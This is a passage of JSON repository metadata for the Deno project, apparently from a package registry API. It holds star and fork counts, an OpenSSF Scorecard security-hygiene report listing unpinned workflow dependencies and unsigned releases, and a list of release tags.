TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1